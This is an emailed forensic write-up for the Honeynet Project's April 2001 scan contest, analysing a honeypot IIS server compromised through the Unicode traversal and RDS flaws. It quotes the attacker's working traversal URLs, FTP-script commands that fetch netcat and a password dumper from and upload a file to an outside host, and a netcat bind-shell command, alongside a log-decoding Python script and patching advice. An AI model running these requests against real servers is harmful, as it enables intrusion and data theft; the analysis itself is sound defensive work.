From fbsi@gamewood.net Fri Apr 20 20:28:50 2001
Date: Tue, 03 Apr 2001 10:20:08 -0400
From: "John K. Riggleman, Jr."
To: project@honeynet.org
Subject: Entry for April 2001 Scan #14

Here is a document regarding this month's scan. Thanks again for providing the contest and giving me something to do.

********************************
* Scan 14 Analysis - NT Attack *
********************************

*************************
* Analysis and Document *
*-----------------------*
* John K. Riggleman Jr. *
*************************

*************
* Questions *
*************

*************************************************************************
* 1. Which exploit(s) were used to attack the system?                   *
* 2. How were the exploits used to access and control the system?       *
* 3. What was done once access was gained?                              *
* 4. How could this attack have been prevented?                         *
* 5. How much time did you spend on this analysis and writeup?          *
*                                                                       *
* Bonus Question:                                                       *
* Do you feel that the attacker in question knew if this was a honeypot?*
* If so, why or why not?                                                *
*************************************************************************

*********
* Tools *
*********

**************************************************
* EDIT.COM    # Initial analyzing                *
* WRITE.EXE   # Analyzing                        *
* NOTEPAD.EXE # Writing this document            *
* (Best if viewed in notepad. 800x600 maximized) *
**************************************************

*******************************************************
* 1) Which exploit(s) were used to attack the system? *
*******************************************************

RDS and Unicode IIS-based attacks were used. All of the Unicode requests shown in the next section are issued through the /msadc virtual directory, which belongs to RDS (Remote Data Services).

RDS/IIS 4.0 Vulnerability and Script || By rain forest puppy / ADM / Wiretrip.
------http://security-archive.merton.ox.ac.uk/bugtraq-199907/0178.html

Description of the Unicode-based exploit (the "Web Server Folder Traversal" vulnerability, MS00-078) which was used in this attack.
------http://packetstorm.securify.com/0010-exploits/iis-unicode.txt

*******************************************************************
* 2) How were the exploits used to access and control the system? *
*******************************************************************

The successful Unicode attacks were used to install netcat, a tool that can bind a program's standard input and output to a network port (much like the port-binding shellcode used on Linux, and the shellcode supplied with the IIS4 .HTR buffer overflow exploit).

---- Step-by-Step analysis of Unicode attacks ----

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1

This URL request executes C:\WINNT\System32\cmd.exe /c copy C:\winnt\system32\cmd.exe cmd1.exe, which creates a copy of the command interpreter in the current directory (C:\Program Files\Common Files\system\msadc\). %C0%AF is an overlong two-byte UTF-8 encoding of "/". IIS checked the raw URL for "../" before decoding it and only decoded the overlong sequence afterwards, so each "..%C0%AF.." steps the request out of the msadc directory and up to the root of the drive, where \winnt\system32\cmd.exe is reachable. Note that the copy succeeded, so the account IIS ran cmd.exe under had write access to the msadc directory.

(For ease of reading, "~" will be substituted for "GET" + the current working directory. Example:
"GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1"
becomes
"~/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1")

~/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+johna2k+>>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+haxedj00+>>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+get+nc.exe+>>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+get+pdump.exe+>>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+get+samdump.dll+>>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+quit+>>ftpcom HTTP/1.1

These commands use "echo" with redirection (">" creates or truncates the file, ">>" appends to it) to build a file called "ftpcom" in the current working directory. This file is to be used as a script file for FTP.exe, the console-based FTP client included with Windows.
The reconstructed ftpcom file contains (comments are my descriptions):
------------
open 213.116.251.162   # Open an FTP connection to 213.116.251.162
johna2k                # Login name
haxedj00               # Password
get nc.exe             # Download netcat
get pdump.exe          # Download a password dumper *[1]*
get samdump.dll        # Download the DLL required by the password dumper
quit                   # Exit the FTP program / disconnect from the remote system

*[1]* - Most likely similar to the dumper found at:
-----http://www.webspan.net/~tas/pwdump2/
------------

~/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1

This command runs FTP.exe with "-s:ftpcom" on the command line, specifying "ftpcom" as a script. Since FTP.exe prompts for the user name and password after "open", the second and third lines of the script are consumed as the answers to those prompts.

~/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1

This executes netcat with the following parameters:
----
-l           # listen for an incoming connection
-p 6969      # the port (6969) for netcat to listen on
-e cmd1.exe  # the program to execute, with its input/output "piped" to the connection
----
With this command, telnetting to port 6969 of the attacked machine provides a console prompt capable of creating/modifying directories and files. The prompt runs under the same account IIS used to launch cmd1.exe (the anonymous web user, IUSR_<machine name>, on IIS 4/5), which is what limits the intruder in the next section.

********************************************
* 3) What was done once access was gained? *
********************************************

Apparently the intruder is more "at home" in a Linux/*nix-based environment. Using "cat" instead of "type", "cd /winnt" instead of "cd \winnt", and "ls" instead of "dir" are several instances where this was clearly noticeable.

The intruder created several text files *[2]* and tried to access some of them remotely from a web browser. A file "test.txt" in the wwwroot directory was accessible remotely. The person also tried using "net", apparently to get more information on the compromised system's local network. The user also tried to redirect the output to a file, perhaps in hopes that it would work (but the attacker did not have the permissions that would allow this). The user browsed through the system quite a bit, finding exploit source code and other such files.
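The decoding and reconstruction done by hand in section 2 can be scripted, which helps when a log holds hundreds of such requests. The following Python is an added example written for this analysis; it is not part of the original submission and not a tool the intruder or the Honeynet Project supplied. It decodes the overlong UTF-8 sequence the way the unpatched server did, resolves each request to the file actually executed (using the msadc physical path stated in section 2), replays the echo redirections to rebuild ftpcom, and then reports the FTP server, the credentials, the transfers and the netcat listener. The request lines inside it are re-typed from the ones quoted in section 2, not copied from the raw log.

```python
"""Decode the IIS 'Unicode' traversal requests quoted in section 2 and replay
the echo-built ftpcom script. Added example for this analysis, not part of the
original submission; the request lines are re-typed from the writeup, not
copied from the raw log."""
import ntpath
import re
from urllib.parse import unquote, unquote_to_bytes

VDIRS = {"/msadc": r"C:\Program Files\Common Files\system\msadc"}  # per section 2
TRAV = "..%C0%AF../..%C0%AF../..%C0%AF../"  # %C0%AF is an overlong encoding of '/'
CMD1 = "/msadc/" + TRAV + "program%20files/common%20files/system/msadc/cmd1.exe"
REQUESTS = [  # constructed from the request lines in section 2
    "GET /msadc/" + TRAV + "winnt/system32/cmd.exe?/c+copy+C:\\winnt\\system32\\cmd.exe+cmd1.exe HTTP/1.1",
    "GET " + CMD1 + "?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1",
    "GET " + CMD1 + "?/c+echo+johna2k+>>ftpcom HTTP/1.1",
    "GET " + CMD1 + "?/c+echo+haxedj00+>>ftpcom HTTP/1.1",
    "GET " + CMD1 + "?/c+echo+get+nc.exe+>>ftpcom HTTP/1.1",
    "GET " + CMD1 + "?/c+echo+get+pdump.exe+>>ftpcom HTTP/1.1",
    "GET " + CMD1 + "?/c+echo+get+samdump.dll+>>ftpcom HTTP/1.1",
    "GET " + CMD1 + "?/c+echo+quit+>>ftpcom HTTP/1.1",
    "GET " + CMD1 + "?/c+ftp+-s:ftpcom HTTP/1.1",
    "GET " + CMD1 + "?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1",
]
REQ_RE = re.compile(r"^GET (?P<path>[^?\s]+)(?:\?(?P<query>\S*))? HTTP/1\.[01]$")


def iis_decode(path: str) -> tuple[str, bool]:
    """Percent-decode, then UTF-8-decode as leniently as pre-MS00-078 IIS did:
    a two-byte sequence whose value fits in 7 bits (%C0%AF -> '/') is accepted
    although such overlong forms are illegal, so the '../' it hides slips past
    the traversal check IIS made on the raw URL. Only two-byte sequences are
    modelled; other bytes are taken as Latin-1 (enough for these ASCII requests)."""
    raw = unquote_to_bytes(path)
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)
            overlong |= cp < 0x80
            out.append(chr(cp))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out), overlong


def physical_path(decoded: str) -> tuple[str, bool]:
    """Map the decoded path onto disk via its virtual directory; ntpath drops
    the surplus '..' at the drive root as Windows does. Returns (path, escapes)."""
    for vdir, root in VDIRS.items():
        if decoded.lower().startswith(vdir + "/"):
            phys = ntpath.normpath(root + decoded[len(vdir):])
            return phys, not phys.lower().startswith(root.lower() + "\\")
    raise ValueError("no virtual directory matches " + decoded)


def parse_request(line: str) -> dict:
    """Executable actually reached plus the argv cmd.exe saw ('+' became space)."""
    m = REQ_RE.match(line)
    if not m:
        raise ValueError("not a GET request line: " + line)
    decoded, overlong = iis_decode(m["path"])
    exe, escapes = physical_path(decoded)
    argv = [unquote(a) for a in m["query"].split("+")] if m["query"] else []
    return {"exe": exe, "overlong": overlong, "escapes": escapes, "argv": argv}


def replay(requests: list[str]) -> dict:
    """Model only 'echo ... >file' / '>>file' against an in-memory directory and
    record everything else. (cmd.exe also keeps the space before '>' in what it
    writes; ftp.exe evidently tolerated that, so it is not reproduced.)"""
    files, events = {}, []
    for line in requests:
        r = parse_request(line)
        a = r["argv"]
        if a[:2] == ["/c", "echo"] and a[-1].startswith(">"):
            target = a[-1].lstrip(">")
            if not a[-1].startswith(">>"):  # a single '>' truncates the file
                files[target] = []
            files.setdefault(target, []).append(" ".join(a[2:-1]))
        events.append(r)
    return {"files": {k: "\n".join(v) for k, v in files.items()}, "events": events}


def ftp_summary(script: str) -> dict:
    """Read an 'ftp -s:' script: 'open HOST', then the answers to the user and
    password prompts on the next two lines, then get/put commands."""
    lines = script.splitlines()
    i = next(n for n, l in enumerate(lines) if l.startswith("open "))
    return {"server": lines[i].split()[1], "user": lines[i + 1], "password": lines[i + 2],
            "transfers": [tuple(l.split()) for l in lines[i + 3:] if l.split()[0] in ("get", "put")]}


def listeners(events: list[dict]) -> list[tuple[str, str]]:
    """(port, program) for each 'nc -l -p PORT -e PROG' the attacker started."""
    found = []
    for a in (e["argv"] for e in events):
        if len(a) > 1 and a[1] == "nc" and {"-l", "-p", "-e"} <= set(a):
            found.append((a[a.index("-p") + 1], a[a.index("-e") + 1]))
    return found


if __name__ == "__main__":
    res = replay(REQUESTS)
    for e in res["events"]:
        print("ESCAPES" if e["escapes"] else "       ", e["exe"], " ".join(e["argv"]))
    print(res["files"]["ftpcom"], ftp_summary(res["files"]["ftpcom"]), listeners(res["events"]), sep="\n")
```

Run directly, it prints one line per request, flagging those whose resolved path leaves the virtual directory. Only the first request (cmd.exe under \winnt) is flagged; the later ones traverse out of msadc and straight back into it to reach cmd1.exe, so the "overlong" flag, not the path check, is what catches them. A production version would read the real log (the IIS W3C format keeps the URI and the query in separate fields) and would also accept three-byte overlong forms such as %E0%80%AF.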
On attempting to use the "pdump" utility, "Failed to open lsass: 5. Exiting." was returned. Error 5 is ERROR_ACCESS_DENIED: a pwdump-style tool has to open the LSASS process to get at the password hashes, which requires administrative rights. Once again, the intruder just doesn't have the permissions to do so.

~/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+johna2k+>>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+haxedj00+>>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+put+c:\wiretrip\whisker.tar.gz+>>ftpcom HTTP/1.1
~/cmd1.exe?/c+echo+quit+>>ftpcom HTTP/1.1
~/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1

The "ftpcom" file is overwritten with a script that uploads "c:\wiretrip\whisker.tar.gz" to the attacker's FTP server, and the script is executed. This could have been done from the netcat prompt, but was done through the Unicode URLs instead. *shrug*

*[2]* - The contents of these text files are described in the Bonus Question.

*************************************************
* 4) How could this attack have been prevented? *
*************************************************

The Unicode bug can be corrected by patching (MS00-078):
------http://www.microsoft.com/technet/security/bulletin/fq00-078.asp

Beyond the patch, several things would have stopped or limited this particular attack:

- Keep web content (and the /msadc virtual directory, if it is needed at all) on a different drive from %SystemRoot%. The traversal cannot cross drive letters, so cmd.exe would have been out of reach.
- Remove the anonymous web user's execute permission on cmd.exe and its write permission on the web and virtual directories. The attack depended on both: copying cmd.exe to cmd1.exe needed write access to msadc, and every later step ran cmd1.exe.
- Filter traffic at the perimeter. The intruder needed an outbound FTP connection to 213.116.251.162 to fetch the tools and an inbound connection to port 6969 to reach the netcat listener; blocking either one would have ended the attack at that step.

Also, if the admin uses a different FTP client, the console-based FTP.exe could be removed. This only raises the bar slightly, since TFTP.EXE is also installed by default, but it does break this exact tool chain.

****************************************************************
* 5) How much time did you spend on this analysis and writeup? *
****************************************************************

Initial reading of entire logs          - ~1.5 hours
Data collection + typing + proofreading - ~2.5 hours
----------------------------------------------------------
Estimated 4 hours

*************************************************************************
* Bonus Question:                                                       *
* Do you feel that the attacker in question knew if this was a honeypot?*
* If so, why or why not?                                                *
*************************************************************************

The attacker was aware that the system was a honeypot, based on two of the text files that were created. They were:

____ C:\README.NOW.Hax0r ____
Hi, i know that this is a lab server, but patch the holes!
:-)

____ C:\rfp.txt ____
best honeypot i've seen till now :)

(The file name refers to rain forest puppy, "rfp", of Wiretrip, author of the RDS exploit cited in section 1 and of the whisker scanner that the intruder uploaded from c:\wiretrip.)

---------------------------------------------------------------------------------------------
|||||||||||||||||| April 03, 2001 || 10:17 AM EST || John K. Riggleman Jr. ||||||||||||||||||
---------------------------------------------------------------------------------------------